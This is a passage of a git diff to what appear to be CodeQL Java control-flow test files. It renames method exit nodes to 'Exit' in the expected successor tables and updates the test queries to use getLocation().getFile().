; | | Exhaustive.java:3:15:3:15 | ; | Exhaustive.java:3:15:3:15 | new E(...) | | Exhaustive.java:3:15:3:15 | new E(...) | Exhaustive.java:3:15:3:15 | ...=... | -| Exhaustive.java:3:18:3:18 | ...=... | Exhaustive.java:3:8:3:8 | | +| Exhaustive.java:3:18:3:18 | ...=... | Exhaustive.java:3:8:3:8 | Exit | | Exhaustive.java:3:18:3:18 | ; | Exhaustive.java:3:18:3:18 | new E(...) | | Exhaustive.java:3:18:3:18 | new E(...) | Exhaustive.java:3:18:3:18 | ...=... | -| Exhaustive.java:5:15:5:15 | super(...) | Exhaustive.java:5:15:5:15 | X | +| Exhaustive.java:5:15:5:15 | super(...) | Exhaustive.java:5:15:5:15 | Exit | | Exhaustive.java:5:15:5:15 | { ... } | Exhaustive.java:5:15:5:15 | super(...) | -| Exhaustive.java:6:15:6:15 | super(...) | Exhaustive.java:6:15:6:15 | Y | +| Exhaustive.java:6:15:6:15 | super(...) | Exhaustive.java:6:15:6:15 | Exit | | Exhaustive.java:6:15:6:15 | { ... } | Exhaustive.java:6:15:6:15 | super(...) | | Exhaustive.java:8:47:35:3 | { ... } | Exhaustive.java:11:5:11:14 | switch (...) | | Exhaustive.java:11:5:11:14 | switch (...) | Exhaustive.java:11:13:11:13 | o | @@ -50,10 +50,10 @@ | Exhaustive.java:30:13:30:13 | i | Exhaustive.java:31:7:31:15 | case | | Exhaustive.java:31:7:31:15 | case | Exhaustive.java:31:14:31:14 | | | Exhaustive.java:31:7:31:15 | case | Exhaustive.java:32:7:32:15 | case | -| Exhaustive.java:31:14:31:14 | | Exhaustive.java:8:22:8:25 | test | +| Exhaustive.java:31:14:31:14 | | Exhaustive.java:8:22:8:25 | Exit | | Exhaustive.java:32:7:32:15 | case | Exhaustive.java:32:14:32:14 | | -| Exhaustive.java:32:14:32:14 | | Exhaustive.java:8:22:8:25 | test | -| Test.java:1:14:1:17 | super(...) | Test.java:1:14:1:17 | Test | +| Exhaustive.java:32:14:32:14 | | Exhaustive.java:8:22:8:25 | Exit | +| Test.java:1:14:1:17 | super(...) | Test.java:1:14:1:17 | Exit | | Test.java:1:14:1:17 | { ... } | Test.java:1:14:1:17 | super(...) | | Test.java:3:41:134:3 | { ... } | Test.java:5:6:5:19 | switch (...) | | Test.java:5:6:5:19 | switch (...) | Test.java:5:14:5:18 | thing | @@ -380,9 +380,9 @@ | Test.java:130:8:130:21 | case | Test.java:130:20:130:20 | | | Test.java:130:8:130:21 | case | Test.java:131:8:131:15 | default | | Test.java:130:20:130:20 | | Test.java:131:8:131:15 | default | -| Test.java:131:8:131:15 | default | Test.java:3:22:3:25 | test | +| Test.java:131:8:131:15 | default | Test.java:3:22:3:25 | Exit | | Test.java:138:8:138:8 | ...=... | Test.java:138:8:138:8 | ; | -| Test.java:138:8:138:8 | ...=... | Test.java:138:8:138:8 | A | +| Test.java:138:8:138:8 | ...=... | Test.java:138:8:138:8 | Exit | | Test.java:138:8:138:8 | ; | Test.java:138:8:138:8 | this | | Test.java:138:8:138:8 | ; | Test.java:138:8:138:8 | this | | Test.java:138:8:138:8 | b | Test.java:138:8:138:8 | ...=... | @@ -392,7 +392,7 @@ | Test.java:138:8:138:8 | this | Test.java:138:8:138:8 | field3 | | Test.java:138:8:138:8 | { ... } | Test.java:138:8:138:8 | super(...) | | Test.java:139:8:139:8 | ...=... | Test.java:139:8:139:8 | ; | -| Test.java:139:8:139:8 | ...=... | Test.java:139:8:139:8 | B | +| Test.java:139:8:139:8 | ...=... | Test.java:139:8:139:8 | Exit | | Test.java:139:8:139:8 | ; | Test.java:139:8:139:8 | this | | Test.java:139:8:139:8 | ; | Test.java:139:8:139:8 | this | | Test.java:139:8:139:8 | field1 | Test.java:139:8:139:8 | ...=... | diff --git a/java/ql/test/library-tests/pattern-switch/cfg/test.ql b/java/ql/test/library-tests/pattern-switch/cfg/test.ql index 4511277ee7d..7e0a85af822 100644 --- a/java/ql/test/library-tests/pattern-switch/cfg/test.ql +++ b/java/ql/test/library-tests/pattern-switch/cfg/test.ql @@ -1,5 +1,5 @@ import java from ControlFlowNode cn -where cn.getFile().getBaseName() = ["Test.java", "Exhaustive.java"] +where cn.getLocation().getFile().getBaseName() = ["Test.java", "Exhaustive.java"] select cn, cn.getASuccessor() diff --git a/java/ql/test/library-tests/successors/CloseReaderTest/TestSucc.expected b/java/ql/test/library-tests/successors/CloseReaderTest/TestSucc.expected index 63af489090b..a6f3820334a 100644 --- a/java/ql/test/library-tests/successors/CloseReaderTest/TestSucc.expected +++ b/java/ql/test/library-tests/successors/CloseReaderTest/TestSucc.expected @@ -1,4 +1,4 @@ -| CloseReaderTest.java:8:14:8:28 | super(...) | CloseReaderTest.java:8:14:8:28 | CloseReaderTest | +| CloseReaderTest.java:8:14:8:28 | super(...) | CloseReaderTest.java:8:14:8:28 | Exit | | CloseReaderTest.java:8:14:8:28 | { ... } | CloseReaderTest.java:8:14:8:28 | super(...) | | CloseReaderTest.java:10:2:24:2 | { ... } | CloseReaderTest.java:12:3:13:42 | ; | | CloseReaderTest.java:12:3:12:12 | System.out | CloseReaderTest.java:12:20:12:40 | "Enter password for " | @@ -19,12 +19,12 @@ | CloseReaderTest.java:16:5:16:13 | System.in | CloseReaderTest.java:15:45:16:14 | new InputStreamReader(...) | | CloseReaderTest.java:17:3:23:3 | try ... | CloseReaderTest.java:18:3:20:3 | { ... } | | CloseReaderTest.java:18:3:20:3 | { ... } | CloseReaderTest.java:19:11:19:15 | stdin | -| CloseReaderTest.java:19:4:19:27 | return ... | CloseReaderTest.java:9:23:9:34 | readPassword | +| CloseReaderTest.java:19:4:19:27 | return ... | CloseReaderTest.java:9:23:9:34 | Exit | | CloseReaderTest.java:19:11:19:15 | stdin | CloseReaderTest.java:19:11:19:26 | readLine(...) | | CloseReaderTest.java:19:11:19:26 | readLine(...) | CloseReaderTest.java:19:4:19:27 | return ... | | CloseReaderTest.java:19:11:19:26 | readLine(...) | CloseReaderTest.java:20:5:20:26 | catch (...) | | CloseReaderTest.java:20:5:20:26 | catch (...) | CloseReaderTest.java:20:24:20:25 | ex | | CloseReaderTest.java:20:24:20:25 | ex | CloseReaderTest.java:21:3:23:3 | { ... } | | CloseReaderTest.java:21:3:23:3 | { ... } | CloseReaderTest.java:22:11:22:14 | null | -| CloseReaderTest.java:22:4:22:15 | return ... | CloseReaderTest.java:9:23:9:34 | readPassword | +| CloseReaderTest.java:22:4:22:15 | return ... | CloseReaderTest.java:9:23:9:34 | Exit | | CloseReaderTest.java:22:11:22:14 | null | CloseReaderTest.java:22:4:22:15 | return ... | diff --git a/java/ql/test/library-tests/successors/CloseReaderTest/TestSucc.ql b/java/ql/test/library-tests/successors/CloseReaderTest/TestSucc.ql index 9de77b3c42b..6fca436fbfd 100644 --- a/java/ql/test/library-tests/successors/CloseReaderTest/TestSucc.ql +++ b/java/ql/test/library-tests/successors/CloseReaderTest/TestSucc.ql @@ -4,5 +4,5 @@ from ControlFlowNode n, ControlFlowNode succ where succ = n.getASuccessor() and n.getLocation().getFile().getExtension() = "java" and - not n.getFile().getStem() = "PopulateRuntimeException" + not n.getLocation().getFile().getStem() = "PopulateRuntimeException" select n, succ diff --git a/java/ql/test/library-tests/successors/LoopVarReadTest/TestSucc.expected b/java/ql/test/library-tests/successors/LoopVarReadTest/TestSucc.expected index 4598c7e0e32..dcf2dac3cca 100644 --- a/java/ql/test/library-tests/successors/LoopVarReadTest/TestSucc.expected +++ b/java/ql/test/library-tests/successors/LoopVarReadTest/TestSucc.expected @@ -1,4 +1,4 @@ -| LoopVarReadTest.java:3:14:3:28 | super(...) | LoopVarReadTest.java:3:14:3:28 | LoopVarReadTest | +| LoopVarReadTest.java:3:14:3:28 | super(...) | LoopVarReadTest.java:3:14:3:28 | Exit | | LoopVarReadTest.java:3:14:3:28 | { ... } | LoopVarReadTest.java:3:14:3:28 | super(...) | | LoopVarReadTest.java:5:2:15:2 | { ... } | LoopVarReadTest.java:6:3:6:12 | var ...; | | LoopVarReadTest.java:6:3:6:12 | var ...; | LoopVarReadTest.java:6:11:6:11 | 2 | @@ -23,6 +23,6 @@ | LoopVarReadTest.java:12:7:12:12 | q | LoopVarReadTest.java:14:3:14:28 | ; | | LoopVarReadTest.java:12:11:12:12 | 10 | LoopVarReadTest.java:12:7:12:12 | q | | LoopVarReadTest.java:14:3:14:12 | System.out | LoopVarReadTest.java:14:22:14:26 | "foo" | -| LoopVarReadTest.java:14:3:14:27 | println(...) | LoopVarReadTest.java:4:21:4:28 | testLoop | +| LoopVarReadTest.java:14:3:14:27 | println(...) | LoopVarReadTest.java:4:21:4:28 | Exit | | LoopVarReadTest.java:14:3:14:28 | ; | LoopVarReadTest.java:14:3:14:12 | System.out | | LoopVarReadTest.java:14:22:14:26 | "foo" | LoopVarReadTest.java:14:3:14:27 | println(...) | diff --git a/java/ql/test/library-tests/successors/LoopVarReadTest/TestSucc.ql b/java/ql/test/library-tests/successors/LoopVarReadTest/TestSucc.ql index 9de77b3c42b..6fca436fbfd 100644 --- a/java/ql/test/library-tests/successors/LoopVarReadTest/TestSucc.ql +++ b/java/ql/test/library-tests/successors/LoopVarReadTest/TestSucc.ql @@ -4,5 +4,5 @@ from ControlFlowNode n, ControlFlowNode succ where succ = n.getASuccessor() and n.getLocation().getFile().getExtension() = "java" and - not n.getFile().getStem() = "PopulateRuntimeException" + not n.getLocation().getFile().getStem() = "PopulateRuntimeException" select n, succ diff --git a/java/ql/test/library-tests/successors/SaveFileTest/TestSucc.expected b/java/ql/test/library-tests/successors/SaveFileTest/TestSucc.expected index 2c6f433af5a..3c261f67ee1 100644 --- a/java/ql/test/library-tests/successors/SaveFileTest/TestSucc.expected +++ b/java/ql/test/library-tests/successors/SaveFileTest/TestSucc.expected @@ -1,4 +1,4 @@ -| SaveFileTest.java:11:14:11:25 | super(...) | SaveFileTest.java:11:14:11:25 | SaveFileTest | +| SaveFileTest.java:11:14:11:25 | super(...) | SaveFileTest.java:11:14:11:25 | Exit | | SaveFileTest.java:11:14:11:25 | { ... } | SaveFileTest.java:11:14:11:25 | super(...) | | SaveFileTest.java:15:2:55:2 | { ... } | SaveFileTest.java:17:3:17:25 | var ...; | | SaveFileTest.java:17:3:17:25 | var ...; | SaveFileTest.java:17:21:17:24 | path | @@ -95,9 +95,9 @@ | SaveFileTest.java:48:5:48:15 | flush(...) | SaveFileTest.java:50:6:50:30 | catch (...) | | SaveFileTest.java:48:5:48:16 | ; | SaveFileTest.java:48:5:48:7 | bos | | SaveFileTest.java:49:5:49:7 | bos | SaveFileTest.java:49:5:49:15 | close(...) | -| SaveFileTest.java:49:5:49:15 | close(...) | SaveFileTest.java:12:14:12:21 | saveFile | +| SaveFileTest.java:49:5:49:15 | close(...) | SaveFileTest.java:12:14:12:21 | Exit | | SaveFileTest.java:49:5:49:15 | close(...) | SaveFileTest.java:50:6:50:30 | catch (...) | | SaveFileTest.java:49:5:49:16 | ; | SaveFileTest.java:49:5:49:7 | bos | | SaveFileTest.java:50:6:50:30 | catch (...) | SaveFileTest.java:50:23:50:29 | ignored | | SaveFileTest.java:50:23:50:29 | ignored | SaveFileTest.java:51:4:52:4 | { ... } | -| SaveFileTest.java:51:4:52:4 | { ... } | SaveFileTest.java:12:14:12:21 | saveFile | +| SaveFileTest.java:51:4:52:4 | { ... } | SaveFileTest.java:12:14:12:21 | Exit | diff --git a/java/ql/test/library-tests/successors/SaveFileTest/TestSucc.ql b/java/ql/test/library-tests/successors/SaveFileTest/TestSucc.ql index 9de77b3c42b..6fca436fbfd 100644 --- a/java/ql/test/library-tests/successors/SaveFileTest/TestSucc.ql +++ b/java/ql/test/library-tests/successors/SaveFileTest/TestSucc.ql @@ -4,5 +4,5 @@ from ControlFlowNode n, ControlFlowNode succ where succ = n.getASuccessor() and n.getLocation().getFile().getExtension() = "java" and - not n.getFile().getStem() = "PopulateRuntimeException" + not n.getLocation().getFile().getStem() = "PopulateRuntimeException" select n, succ diff --git a/java/ql/test/library-tests/successors/SchackTest/TestSucc.expected b/java/ql/test/library-tests/successors/SchackTest/TestSucc.expected index 9bbb912e6d9..c645abe3507 100644 --- a/java/ql/test/library-tests/successors/SchackTest/TestSucc.expected +++ b/java/ql/test/library-tests/successors/SchackTest/TestSucc.expected @@ -1,8 +1,8 @@ -| SchackTest.java:1:14:1:23 | super(...) | SchackTest.java:1:14:1:23 | SchackTest | +| SchackTest.java:1:14:1:23 | super(...) | SchackTest.java:1:14:1:23 | Exit | | SchackTest.java:1:14:1:23 | { ... } | SchackTest.java:1:14:1:23 | super(...) | -| SchackTest.java:2:8:2:10 | super(...) | SchackTest.java:2:8:2:10 | ExA | +| SchackTest.java:2:8:2:10 | super(...) | SchackTest.java:2:8:2:10 | Exit | | SchackTest.java:2:8:2:10 | { ... } | SchackTest.java:2:8:2:10 | super(...) | -| SchackTest.java:3:8:3:10 | super(...) | SchackTest.java:3:8:3:10 | ExB | +| SchackTest.java:3:8:3:10 | super(...) | SchackTest.java:3:8:3:10 | Exit | | SchackTest.java:3:8:3:10 | { ... } | SchackTest.java:3:8:3:10 | super(...) | | SchackTest.java:5:18:24:2 | { ... } | SchackTest.java:6:3:23:3 | try ... | | SchackTest.java:6:3:23:3 | try ... | SchackTest.java:6:7:17:3 | { ... } | @@ -56,7 +56,7 @@ | SchackTest.java:20:23:20:72 | "successor (but neither true nor false successor)" | SchackTest.java:20:4:20:73 | println(...) | | SchackTest.java:21:13:23:3 | { ... } | SchackTest.java:22:4:22:41 | ; | | SchackTest.java:22:4:22:13 | System.out | SchackTest.java:22:23:22:39 | "false successor" | -| SchackTest.java:22:4:22:40 | println(...) | SchackTest.java:5:7:5:9 | foo | +| SchackTest.java:22:4:22:40 | println(...) | SchackTest.java:5:7:5:9 | Exit | | SchackTest.java:22:4:22:41 | ; | SchackTest.java:22:4:22:13 | System.out | | SchackTest.java:22:23:22:39 | "false successor" | SchackTest.java:22:4:22:40 | println(...) | | SchackTest.java:26:35:30:2 | { ... } | SchackTest.java:27:3:27:25 | if (...) | @@ -65,9 +65,9 @@ | SchackTest.java:27:7:27:24 | ... > ... | SchackTest.java:28:10:28:18 | new ExB(...) | | SchackTest.java:27:7:27:24 | ... > ... | SchackTest.java:29:10:29:22 | random(...) | | SchackTest.java:27:23:27:24 | .5 | SchackTest.java:27:7:27:24 | ... > ... | -| SchackTest.java:28:4:28:19 | throw ... | SchackTest.java:26:18:26:20 | bar | +| SchackTest.java:28:4:28:19 | throw ... | SchackTest.java:26:18:26:20 | Exit | | SchackTest.java:28:10:28:18 | new ExB(...) | SchackTest.java:28:4:28:19 | throw ... | -| SchackTest.java:29:3:29:28 | return ... | SchackTest.java:26:18:26:20 | bar | +| SchackTest.java:29:3:29:28 | return ... | SchackTest.java:26:18:26:20 | Exit | | SchackTest.java:29:10:29:22 | random(...) | SchackTest.java:29:26:29:27 | .3 | | SchackTest.java:29:10:29:27 | ... > ... | SchackTest.java:29:3:29:28 | return ... | | SchackTest.java:29:26:29:27 | .3 | SchackTest.java:29:10:29:27 | ... > ... | diff --git a/java/ql/test/library-tests/successors/SchackTest/TestSucc.ql b/java/ql/test/library-tests/successors/SchackTest/TestSucc.ql index 9de77b3c42b..6fca436fbfd 100644 --- a/java/ql/test/library-tests/successors/SchackTest/TestSucc.ql +++ b/java/ql/test/library-tests/successors/SchackTest/TestSucc.ql @@ -4,5 +4,5 @@ from ControlFlowNode n, ControlFlowNode succ where succ = n.getASuccessor() and n.getLocation().getFile().getExtension() = "java" and - not n.getFile().getStem() = "PopulateRuntimeException" + not n.getLocation().getFile().getStem() = "PopulateRuntimeException" select n, succ diff --git a/java/ql/test/library-tests/successors/TestBreak/TestSucc.expected b/java/ql/test/library-tests/successors/TestBreak/TestSucc.expected index e871d474a81..8dac71ffd45 100644 --- a/java/ql/test/library-tests/successors/TestBreak/TestSucc.expected +++ b/java/ql/test/library-tests/successors/TestBreak/TestSucc.expected @@ -1,4 +1,4 @@ -| TestBreak.java:3:14:3:22 | super(...) | TestBreak.java:3:14:3:22 | TestBreak | +| TestBreak.java:3:14:3:22 | super(...) | TestBreak.java:3:14:3:22 | Exit | | TestBreak.java:3:14:3:22 | { ... } | TestBreak.java:3:14:3:22 | super(...) | | TestBreak.java:5:2:85:2 | { ... } | TestBreak.java:7:3:8:11 |